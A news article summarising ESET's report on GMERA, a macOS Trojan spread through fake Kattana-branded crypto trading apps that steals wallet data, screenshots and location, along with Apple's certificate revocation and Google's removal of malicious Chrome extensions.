ESET specialists have discovered the GMERA Trojan, which steals cryptocurrencies from traders. The software is distributed under the guise of applications for trading cryptoassets on Apple MacOS.
Cybersecurity company ESET reported that malware is integrated into fake cryptocurrency trading applications. After installing such extensions, it starts stealing digital assets from user wallets. Attackers impersonate the Kattana trading platform. They have copied the site of the service and are promoting their software under the guise of four applications: Cointrazer, Cupatrade, Licatrade and Trezarus. The Trojan was first detected by the antivirus company Trend Micro in September 2019. At the time, GMERA was being distributed in the form of the Stockfolio app for stock market investments.
ESET specialists reported that when downloading applications from a fake site, the user downloads a folder in ZIP format with an infected version of the application. Moreover, these applications fully support trading functions. Experts added that for a person who does not use the original Kattana services, fake sites may not cause suspicion. Hackers use social engineering to directly contact potential victims. ESET analyzed the malware using the example of the Licatrade application, with which GMERA has only minor differences.
The Trojan installs a shell script on the victim’s computer that provides hackers with access to the user’s system through the downloaded application. This script allows attackers to create C&C servers over HTTP, allowing them to communicate with the victim’s device. GMERA steals the user’s personal data, information about his cryptocurrency wallets, location, as well as screenshots. ESET experts reported this problem to Apple, after which the corporation withdrew the certificate issued by Licatrade on the same day.
Recall that in April Google removed 49 Chrome browser extensions, which were distributed as utilities for working with cryptocurrency wallets, but contained malicious code. Google later removed another 22 extensions that stole cryptocurrencies.